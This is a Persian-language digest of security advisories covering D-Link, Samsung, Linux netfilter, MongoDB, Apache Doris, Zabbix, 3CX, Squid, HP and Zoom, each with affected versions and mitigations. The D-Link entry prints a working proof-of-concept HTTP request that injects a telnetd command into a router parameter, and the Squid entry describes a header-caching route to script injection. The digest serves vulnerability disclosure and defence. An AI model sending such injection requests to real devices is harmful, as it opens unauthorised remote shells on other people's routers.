کشف آسیب‌پذیری‌ در D-Link

تاریخ ایجاد

آسیب‌پذیری با شناسه‌ CVE-2023-49004 در D-Link کشف شد که از راه دور امکان اجرای کد دلخواه از طریق یک اسکریپت دستکاری شده برای پارامتر en را فراهم می‌آورد. 

 

2


•    اثبات آسیب‌پذیری


GET /scandir.sgi?action=umnt&en=;telnetd -&path=aaa&where=bbb HTTP/1.0
Host: shareport.local
Cookie: uid=unUFIr9ia
Cache-Control: max-age=0
Sec-Ch-Ua: "Not=A?Brand";v="99", "Chromium";v="118"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close


محصولات تحت تأثیر
این آسیب‌پذیری محصول D-Link DIR-850L v.B1_FW223WWb01 را تحت تأثیر قرار می‌دهد. 

توصیه‌های امنیتی
توصیه می‌شود کاربران در اسرع وقت نسبت به ارتقاء D-Link DIR-850L  به نسخه‌های وصله ‌شده اقدام نمایند.

 

منبع خبر:


https://github.com/ef4tless/vuln/blob/master/iot/DIR-850L/bug1.md

انتشار به‌روزرسانی شرکت سامسونگ

تاریخ ایجاد

شرکت سامسونگ به منظور رفع آسیب‌پذیری در سیستم‌عامل اندروید دستگاه‌های تلفن همراه هوشمند خود، به‌روزرسانی جدیدی تحت عنوان “SMR-DEC-2023” منتشر کرده است. این آسیب‌پذیری‌ها به ترتیب شدتشان عبارتند از:

1.    آسیب‌پذیری‌های با شدت بحرانی:

CVE-2023-21671, CVE-2023-28574, CVE-2023-22388, CVE-2023-33045, CVE-2023-40077, CVE-2023-40076, CVE-2023-40088

2.    آسیب‌پذیری‌های با شدت بالا:

CVE-2023-28469, CVE-2023-20702, CVE-2023-32835, CVE-2023-32834, CVE-2023-33031, CVE-2023-33059, CVE-2023-33055, CVE-2023-33074, CVE-2023-28545, CVE-2023-24852, CVE-2023-33048, CVE-2023-33056, CVE-2023-33047, CVE-2023-33061, CVE-2023-40079, CVE-2023-40089, CVE-2023-40091, CVE-2023-40095, CVE-2023-40096, CVE-2023-40103, CVE-2023-45774, CVE-2023-45777, CVE-2023-21267, CVE-2023-40073, CVE-2023-40092, CVE-2023-40074, CVE-2023-40075, CVE-2023-40078, CVE-2023-40080, CVE-2023-40082, CVE-2023-40084, CVE-2023-40087, CVE-2023-40090, CVE-2023-40097, CVE-2023-45773, CVE-2023-45775, CVE-2023-45776, CVE-2023-35668, CVE-2023-40083, CVE-2023-21394, CVE-2023-40098, CVE-2023-45781, CVE-2023-40094(A-288896339, A-307719731) , CVE-2023-32837, CVE-2023-32832

1.    آسیب‌پذیری‌های با شدت متوسط: 


CVE-2023-45864, CVE-2023-42483, CVE-2023-40081, CVE-2023-32836

در به‌روزرسانی منتشر شده توسط شرکت سامسونگ (Samsung) برای رابط کاربری OneUI، آسیب‌پذیری در بخش‌های Knox، سیستم تشخیص چهره دوربین جلو، AR Emoji، SmartManagerCN، bootloader، dec_mono_audb of libsavsac.so، Knox Guard، HAL در بخش HDCP، libIfaaCa، softsimd، libsavsvc، Smart Clip و Contacts را برطرف ساخت.

منبع خبر: 


https://security.samsungmobile.com/securityUpdate.smsb
 

آسیب‌پذیری با شدت بالا در netfilter هسته لینوکس

تاریخ ایجاد

مطابق گزارشات اعلام شده،‌ یک آسیب‌پذیری use-after-free‌ با شدت بالا در netfilter در هسته لینوکس کشف شده‌است. Netfilter چارچوبی را فراهم می‌کند که امکان ثبت فراخوانی‌‌های مختلف در هر مرحله‌ای از پیمایش بسته در پشته شبکه و همچنین انجام عملیات‌های مختلف برروی بسته‌ها مانند تغییر آدرس یا پورت‌ها، حذف بسته‌ها، ورود به سیستم و غیره را ایجاد می‌کند.
این آسیب‌پذیری با شناسه CVE-2023-6817 و امتیاز CVSS 7.8 و از نوع use-after-free‌ است. آسیب‌پذیری use-after-free یک آسیب‌پذیری مربوط به استفاده نادرست از حافظه پویا در طول عملیات برنامه است. اگر پس از آزاد کردن یک مکان حافظه، برنامه‌ای نشانگر(pointer) مربوط به آن را پاک نکند، مهاجم می‌تواند از این خطا برای هک کردن برنامه استفاده کند.
در netfilter، مؤلفه nf_tables می‌تواند برای ارتقاء سطح دسترسی مورد بهره‌برداری قرار گیرد. تابع nft_pipapo_walk عناصر غیرفعال را نادیده نمی‌گیرد که این امر منجر به غیرفعال‌سازی مضاعف عناصر PIPAPO (Pile Packet Policies) در هسته شده و آسیب‌پذیری use-after-free را در پی دارد.
 

محصولات آسیب‌پذیر
پیاده‌سازی فعلی این netfilter نسبت به این نقص آسیب‌پذیر است.

توصیه‌های امنیتی
مطابق آنچه بیان شد، برای جلوگیری از بروز این آسیب‌پذیری توصیه می‌شود در پیمایش، عناصر غیرفعال نادیده گرفته شوند و commit قبلی به 317eb9685095678f2c9f5a8189de698c5354316a ارتقاء داده شود.

منبع خبر:


https://nvd.nist.gov/vuln/detail/CVE-2023-6817

حمله سایبری و افشای داده‌های مشتریان MongoDB

تاریخ ایجاد

شرکت MongoDB اعلام کرده است که سیستم‌های این شرکت، مورد حمله قرار گرفته‌اند و اطلاعات مشتریان دستکاری شده است. در ایمیل‌های ارسال شده به مشتریان MongoDB آمده است که در تاریخ 13 دسامبر حمله به سیستم‌ها شناسایی و به بررسی این حادثه پرداخته است. 

1


متاسفانه، سرقت اطلاعات معمولاً در آ اطلاعات فراداده و اطلاعات تماس حساب مشتری  دسته از نقص‌های امنیتی رخ می‌دهد که مهاجم دسترسی مداوم به سیستم داشته است. از آنجا که فراداده مشتریان افشاء شده است، MongoDB به تمامی مشتریان توصیه می‌کند چنانچه قابلیت احرازهویت دو مرحله‌ای را بر روی حساب‌های خود فعال نکرده‌اند، این امکان را فعال کرده و رمزهای عبور خود را تغییر دهند، همچنین در مقابل هرگونه حملات مستعد فیشینگ و حملات مهندسی اجتماعی هوشیار باشند.

توصیه‌های امنیتی
جهت کاهش مخاطرات احتمالی ناشی از آسیب‌پذیری‌ مذکو می‌توانید اقدامات زیر را انجام دهید:
1.  فعال‌سازی احرازهویت دو مرحله‌ای
2.  تغییر منظم و دوره‌ای رمز عبور
3.  بررسی مجوزهای دسترسی‌ کاربران مختلف
4.  آموزش و آگاهی‌رسانی کارکنان
5.  اعمال به‌روزرسانی‌های امنیتی

منبع خبر:


https://www.bleepingcomputer.com/news/security/mongodb-says-customer-data-was-exposed-in-a-cyberatt…

آسیب‌پذیری DoS ‌در Apache Doris

تاریخ ایجاد

یک آسیب‌پذیری با شناسه‌ CVE-2023-41314 و شدت بالا (7.8) در Apache Doris  شناسایی شده است که امکان حمله DoS یا بارگیری فایل‌های دلخواه از گره  FE را از طریق دسترسی بدون احراز هویت برای مهاجم فراهم می‌آورد. این آسیب‌پذیری متأثر از عملکرد ناشناخته فایل /api/snapshot و /api/get_log_file  از مؤلفه API است. دستکاری ورودی ناشناخته منجر به آسیب‌پذیری احراز هویت نامناسب می‌شود. زمانی‌که مهاجم ادعا می‌کند احراز هویت شده است، Apache Doris نمی‌تواند صحت این ادعا را به ‌درستی ثابت ‌کند. این آسیب‌پذیری محرمانگی، یکپارچگی و در دسترس‌پذیری را تحت تأثیر قرار می‌دهد.

محصولات تحت تأثیر
این آسیب‌پذیری محصول Apache Doris نسخه‌های 1.2.0 تا نسخه قبل از 2.0.3 را تحت تاثیر قرار می‌دهد.

توصیه‌های امنیتی
توصیه می‌شود کاربران در اسرع وقت نسبت به ارتقاء Apache Doris به نسخه 2.0.3 اقدام نمایند.

منبع خبر:


https://lists.apache.org/thread/tgvpvz3yw7zgodl1sb3sv3jbbz8t5zb4

کشف آسیب‌پذیری بحرانی‌ در Zabbix

تاریخ ایجاد

آسیب‌پذیری با شناسه‌ CVE-2023-32725 و شدت بحرانی 9.6 در Zabbix کشف شد که امکان نشت کوکی zbx_session هنگام استفاده از یک گزارش زمان‌بندی شده (scheduled reports) که شامل dashboard با URL widget است، را برای مهاجم فراهم می‌آورد. وب‌سایتی که در URL widget  پیکربندی شده است، هنگام آزمایش یا اجرای گزارش‌های زمان‌بندی‌شده، یک کوکی نشست دریافت می‌کند. مهاجم از کوکی نشست دریافتی می‌تواند برای دسترسی به صفحه اصلی به‌عنوان کاربر خاص استفاده کند. هر URL را می‌توان در URL widget توسط کاربر Zabbix پیکربندی کرد. کوکی نشست Zabbix ممکن است برای دارنده وب‌سایت نمایان شود. مهاجم می‌تواند با استفاده از این کوکی وانمود کند که کاربر Zabbix است که گزارش را ایجاد کرده است. گزارش‌های زمان‌بندی‌شده برای انواع کاربرهای با سطح دسترسی Admin و Super Admin در دسترس قرار دارند.

محصولات تحت تأثیر
این آسیب‌پذیری محصول  Zabbix نسخه‌های 6.0.0 تا 6.0.21، 6.4.0 تا 6.4.6 و 7.0.0alpha1 تا 7.0.0alpha3 را تحت تأثیر قرار می‌دهد. 

توصیه‌های امنیتی
توصیه می‌شود کاربران در اسرع وقت نسبت به ارتقاء Zabbix  به نسخه‌های 6.0.22rc1، 6.0.22rc1  و 7.0.0alpha4 اقدام نمایید. همچنین فقط URLهای قابل اعتماد در URL widget پیکربندی شوند.

منبع خبر:

 

https://support.zabbix.com/browse/ZBX-23854

هشدار نقص امنیتی در 3CX

تاریخ ایجاد

شرکت 3CX، اخیراً هشداری منتشر کرده است که به کاربران توصیه می‌کند یکپارچه‌سازی پایگاه‌داده SQL را در سیستم‌عامل خود غیرفعال کنند. این هشدار، به‌دلیل یک مشکل امنیتی در یکپارچه‌سازی پایگاه‌داده SQL، صادر شده است که می‌تواند منجر به نقض داده‌ها شود. 3CX، یک یک راهکار ارتباطی یکپارچه مبتنی بر ابر است که به سازمان‌ها امکان می‌دهد تماس‌های تلفنی خود را مدیریت کنند. یکپارچه‌سازی پایگاه‌داده SQL به 3CX اجازه می‌دهد تا داده‌های تماس‌ را در یک پایگاه‌داده SQL ذخیره کند. این امکان می‌تواند برای سازمان‌هایی که نیاز به دسترسی به داده‌های تماس خود در سیستم‌عامل‌های دیگر دارند مفید باشد. نقص اخیر می‌تواند به مهاجمان اجازه دهد تا به داده‌های تماس سازمان‌های دیگر دسترسی پیدا کنند.

محصولات تحت تأثیر
مشکل امنیتی 3CX VOIP تنها بر نسخه‌های 18 و 20 این نرم‌افزار تأثیر می‌گذارد. علاوه‌بر این، هیچ یک از الگوهای وب CRM دیگر، تحت تأثیر قرار نمی‌گیرند.

توصیه‌های امنیتی
این شرکت به کاربران توصیه می‌کند که یکپارچه‌سازی پایگاه‌داده SQL را در سیستم‌عامل خود غیرفعال کنند.  برای غیرفعال کردن ادغام پایگاه‌داده، مراحل زیر را انجام دهید:
1.    به System > Configuration در 3CX Management Console بروید.
2.    Database Integration را در بخش Integrations انتخاب کنید.
3.    تیک Enable Database Integration را غیرفعال کنید.
4.    روی Save کلیک کنید.
پس از غیرفعال شدن یکپارچه‌سازی پایگاه‌داده SQL، داده‌های تماس، دیگر در پایگاه‌داده SQL ذخیره نمی‌شوند و بدان معناست که در سیستم‌عامل‌های دیگر نیز قابل دسترسی نیستند.


منبع‌خبر:


[1] https://www.bleepingcomputer.com/news/security/3cx-warns-customers-to-disable-sql-database-integrat…

کشف آسیب‌‎پذیری در نرم‌افزار Squid

تاریخ ایجاد

نرم افزار Squid تعداد زیادی از روش‌های ذخیره‌سازی صفحات یا فایل‌های کش‌شده را ارائه می‌دهد. این روش‌ها شامل کش در حافظه استاندارد و روش‌های دیگری است که در نهایت همگی آن‌ها به ذخیره در دیسک می‌انجامند. پاسخ‌های کش‌شده در مخازن مشتری ذخیره می‌شوند و به تاریخچه آن‌ها در حافظه یا روی دیسک اختصاص دارد. زمانی که باید بازیابی شوند، خوانده می‌شوند و پاسخ کش‌شده به مشتری درخواست‌کننده ارسال می‌شود.
معمولاً Squid با استفاده از 4096 بایت حافظه بافر، هدرهای پاسخ را مدیریت می‌کند. این بدان معناست که هر پاسخی که هدرهای آن بیش از 4096 بایت باشد، از چندین بافر که به یکدیگر افزوده شده تشکیل می‌شود. اما هنگامی که یک پاسخ در دیسک ذخیره شده و سپس به‌دنبال آن بازیابی می‌شود، Squid به‌درستی با پاسخ‌های ذخیره‌شده که به چندین بافر 4096 بایتی مرتبط هستند، برخورد نمی‌کند. 
مسأله اصلی در تابع `store_client::readBody` وجود دارد که مسئول تحلیل پاسخ از دیسک است. این مساله زمانی اتفاق می‌افتد که offset برابر با صفر است و len بیشتر از صفر است و rep وضعیت پاسخ هنگام sline برابر با Http::scNone است:
 

1


در واقع ایراد اساسی مربوط به کد زیر می‌باشد:
 

2


تابع `headersEnd` برای تعیین اینکه هدرها در درخواست کجا به پایان می‌رسند و بدنه اصلی درخواست، (اگر مربوط باشد) از کجا شروع می‌شود، استفاده می‌شود. اگر `headersEnd` یک درخواست نامعتبر را دریافت کند، صفر را به‌عنوان خطا برمی‌گرداند. درحالی‌که پاسخ‌های STORE_OK به‌طور عادی بدون بررسی‌های دیگر به `headersEnd` منتقل می‌شوند. در خصوص پاسخ‌های ذخیره شده، داده به 4096 بایت کوتاه می‌شود و بنابراین بیشتر پاسخ‌های ذخیره شده با هدرهای بیشتر از 4096 بایت خراب می‌شوند. وقتی تابع `parseCharBuf` با طول صفر فراخوانی می‌شود، یک خطا رخ می‌دهد و هدرها به‌صورت تجزیه‌نشده علامت‌گذاری نمی‌شوند و در نهایت Squid متوجه می‌شود که مشکلی وجود دارد و یک صفحه خطای «500 خطای داخلی سرویس» به مشتری درخواست‌کننده ارسال می‌کند. بدنه این صفحه خطا حاوی پاسخ ذخیره شده به‌صورت کامل (شامل هدر و بدنه) و بدون فیلتر می‌باشد.
این مسئله به دلایل مختلفی مشکل‌‌ساز است:
1. به‌راحتی می‌توان یک صفحه ایجاد کرد تا با هدرهای بزرگ پاسخ ارسال کند، آنگاه در دیسک ذخیره و کش شود. اما تأثیر این کار کم است، زیرا تنها شیء کش شده‌ای که ممکن است خراب شود، یک صفحه است که از پیش کنترل می‌شود.
2.  می‌توان یک صفحه را که بر آن کنترل نداریم، به پاسخ با هدرهای بزرگ ترغیب کنیم. یکی از روش‌های ممکن می‌تواند آسیب‌پذیری Host Header Injection باشد که تقریباً در همه جا امکان‌پذیر است. روش‌های دیگر هم وجود دارند برای مثال: response splitting 
3. پاسخ خطایی که Squid به مشتری ارسال می‌کند، بدون فیلتر و برچسب است و همان چیزی را که در هدر پاسخ بوده است و در بدنه وجود دارد، ارسال می‌کند. این بدان معناست که هر پاسخی که هدرهایش حاوی HTML باشند، به‌عنوان HTML تجزیه می‌شود. در شرایطی که ما می‌توانیم هدرهای پاسخ یک صفحه وب را کنترل کنیم، اجرای جاوااسکریپت در مرورگر به‌سادگی امکان‌پذیر است؛ زیرا این هدرها اکنون به‌عنوان بخشی از بدنه در نظر گرفته می‌شوند.
برای مثال، فرض کنید یک 'هدف' داریم که هدرهای (پاسخ) را ارسال می‌کند:

34


 اگر این حروف A باعث شوند که هدرهای پاسخ بیش از 4096 بایت شوند، هنگامی که پاسخ روی دیسک ذخیره می‌شود، پاسخ قابل بازیابی نخواهد بود. بازدیدهای بعدی از همان صفحه باعث می‌شود که پاسخ کامل (یعنی هدر و بدنه) به شرح زیر باشد:

5

بنابراین، هدرهای اصلی پاسخ در بدنه پاسخ قرار داده می‌شوند و سپس می‌توانند توسط مرورگر اجرا شوند.

توصیه‌های امنیتی
جهت جلوگیری از مخاطرات احتمالی آسیب‌پذیری مذکور می‌توانید از راهکارهای امنیتی زیر استفاده کنید:
1.  اصلاح کد در Squid: بررسی و اصلاح تابع `store_client::readBody` به منظور افزایش توانایی Squid در مدیریت پاسخ‌های با هدرهای بزرگتر از 4096 بایت.
2.  محدود کردن اندازه هدرها: اعمال سیاست محدودیت اندازه برای هدرهای پاسخ به منظور جلوگیری از ایجاد هدرهایی که بیش از حد بزرگ می‌باشند.
3.  فیلترسازی هدرها: افزودن یک لایه فیلترسازی برای هدرهای پاسخ تا محتوای مخرب یا ناخواسته را حذف یا اصلاح کند.
4.  اعمال به‌روزرسانی
5.  مدیریت دسترسی: افزایش کنترل دسترسی به Squid تا فقط افراد مورد اعتماد اجازه دسترسی به سیستم را داشته باشند.
6.  مانیتورینگ و لاگ‌گیری: راه‌اندازی یک سیستم مانیتورینگ و لاگ‌گیری جهت نظارت بر عملکرد Squid و شناسایی هر نوع فعالیت مشکوک.
7.  آزمون امنیتی: اجرای آزمون‌های امنیتی دوره‌ای بر روی Squid به منظور شناسایی هرگونه آسیب‌پذیری جدید.

منابع خبر:


[1] https://megamansec.github.io/Squid-Security-Audit/cache-headers.html
[2] https://github.com/squid-cache/squid/security/advisories/GHSA-wgq4-4cfg-c4x3

کشف آسیب‌پذیری در چاپگر HP OfficeJet Pro

تاریخ ایجاد

یک آسیب‌پذیری با شناسه CVE-2023-4694 و شدت بحرانی (در دسته CWE-404) در چاپگر HP OfficeJet Pro کشف شده است. این آسیب‌پذیری بر روی کد SOAP Message Handler تأثیر گذاشته و مهاجم می‌تواند از این طریق حمله انکار سرویس (DoS) انجام دهد، شایان ذکر است که برای حمله به دسترسی به شبکه محلی نیاز نیست. 

توصیه‌های امنیتی
به کاربران توصیه می‌شود جهت جلوگیری از مخاطرات احتمالی این آسیب‌پذیری، راهکارهای امنیتی زیر را اعمال کنند :
1.  به‌روزرسانی نرم‌افزار: اطمینان حاصل کنید که نرم‌افزار چاپگر شما به آخرین نسخه، به‌روزرسانی شده باشد. 
2.  استفاده از فایروال: تنظیمات فایروال را به‌طور صحیح پیکربندی کنید تا دسترسی به پورت‌های غیرضروری، از جمله پورت TCP 3911 محدود شود.
3.  مدیریت دسترسی: پیکربندی صحیح دسترسی‌ها به چاپگر در شبکه محلی حائز اهمیت می‌باشد به طوری که باید دسترسی به پورت‌ها و سرویس‌های غیرضروری برای کاربران غیرمجاز محدود شوند.
4.  استفاده از محصولات جایگزین: اگر امکان اعمال به‌روزرسانی وجود ندارد، بهتر است به دنبال محصولات جایگزین باشید.

منبع خبر:


https://support.hp.com/us-en/document/ish_9823639-9823677-16/hpsbpi03894

کشف آسیب‌پذیری‌های متعدد در نرم‌افزار جلسات آنلاین Zoom

تاریخ ایجاد

به تازگی آسیب‌پذیری‌های جدیدی در نسخه تلفن همراه و دسکتاپ نرم‌افزار Zoom کشف شده است.  نرم‌افزار محبوب برگزاری جلسات تصویری Zoom با مشکلات امنیتی در نسخه‌های دسکتاپ و تلفن همراه روبه‌رو است که امکان ارتقاء سطح دسترسی (privilege escalation) را برای مهاجم فراهم می‌کند. این امر ممکن است ناشی از خطا در سیستم، تنظیمات نادرست یا کنترل‌های دسترسی ناکافی باشد.

•    آسیب‌پذیری‌های Zoom در نسخه تلفن همراه: 
1.  CVE-2023-43583 – مشکلات رمزنگاری: 
   - این آسیب‌پذیری با شدت متوسط CVSS 4.9 به مشکلات رمزنگاری در SDKهای Zoom در سیستم‌عامل‌های Android و iOS اشاره دارد که اجازه می‌دهد مهاجم اطلاعات خصوصی را از طریق دسترسی خود افشا کند.
2.  CVE-2023-43585 – کنترل دسترسی نادرست: 
   - این آسیب‌پذیری با شدت CVSS 7.1 به مشکلات کنترل دسترسی نادرست در نرم‌افزار Zoom سیستم‌عامل iOS اشاره دارد که در نسخه‌های قبل از 5.16.5، به کاربر تأییدشده امکان دسترسی به اطلاعات از طریق دسترسی شبکه را فراهم می‌کند.

•    آسیب‌پذیری‌های Zoom در نسخه دسکتاپ: 
1.  CVE-2023-43586 – پیمایش مسیر (Path Traversal): 
   - این آسیب‌پذیری با شدت CVSS 7.3 به اجازه به کاربر مجاز امکان اجرای یک حمله برای ارتقاء سطح دسترسی از طریق دسترسی به شبکه در نسخه دسکتاپ Zoom، Zoom VDI Client و Zoom SDK برای ویندوز را می‌دهد.
2.  CVE-2023-36540 – مسیر جستجوی ناامن: 
   - این آسیب‌پذیری با شدت CVSS 7.3 به مشکلات کنترل دسترسی نادرست در نصب‌کننده Zoom برای ویندوز اشاره دارد. نسخه‌های قبل از 5.14.5 این نرم‌افزار به مهاجم اجازه ارتقاء سطح دسترسی از طریق یک مسیر جستجوی ناامن را خواهد داد.
3.  CVE-2023-36541 – عدم تأیید اعتبار داده‌ها: 
   - این آسیب‌پذیری با شدت CVSS 8 به عدم تأیید اعتبار داده‌ها اشاره دارد. در نسخه‌های قبل از 5.14.5 تأیید اعتبار داده‌های ناکافی ممکن بوده و برای کاربر تأییدشده از طریق دسترسی شبکه امکان ارتقاء سطح دسترسی را فراهم می‌کرده است.
4.  CVE-2023-36534 – مسیر جستجوی ناامن: 
   - این آسیب‌پذیری با شدت CVSS 9.3 به مشکلات کنترل دسترسی نادرست از طریق دسترسی شبکه در نسخه 5.14.7 Zoom برای ویندوز اشاره دارد.
5.  CVE-2023-39216 – اعتبارسنجی ورودی نادرست: 
   - این آسیب‌پذیری با شدت CVSS 9.6 به مشکلات اعتبارسنجی ورودی نادرست از طریق دسترسی شبکه در نسخه 5.14.7 Zoom برای ویندوز اشاره دارد.
6.  CVE-2023-39213 – عدم بررسی ورودی برنامه: 
   - این آسیب‌پذیری با شدت CVSS 9.6 به مشکلات بررسی نشدن ورودی برنامه در نسخه 5.14.7 Zoom برای ویندوز و Zoom VDI Client اشاره دارد.

توصیه‌های امنیتی
جهت جلوگیری از مشکلات امنیتی در نرم‌افزار Zoom و به حداقل رساندن مخاطرات احتمالی، می‌توانید از راهکارهای زیر استفاده کنید:
1.  به‌روزرسانی نرم‌افزار: اطمینان حاصل کنید که نرم‌افزار Zoom در دستگاه‌های شما به‌روز شده باشد. 
2.  تنظیمات امنیتی: از تنظیمات امنیتی قابل دسترسی در Zoom استفاده کنید. برای مثال، استفاده از رمز عبور برای جلسات، فعال کردن "Waiting Room" برای کنترل ورود به جلسات و استفاده از تنظیمات دیگر امنیتی که توسط Zoom ارائه شده‌اند.
3. استفاده از حساب‌های با امنیت بالا: از حساب‌های Zoom با سطح امنیت بالاتر مثل حساب‌های Pro یا Business استفاده کنید. این حساب‌ها امکانات امنیتی بیشتری را فراهم می‌کنند.

منبع خبر:


https://cybersecuritynews.com/zoom-mobile-and-desktop-app-flaws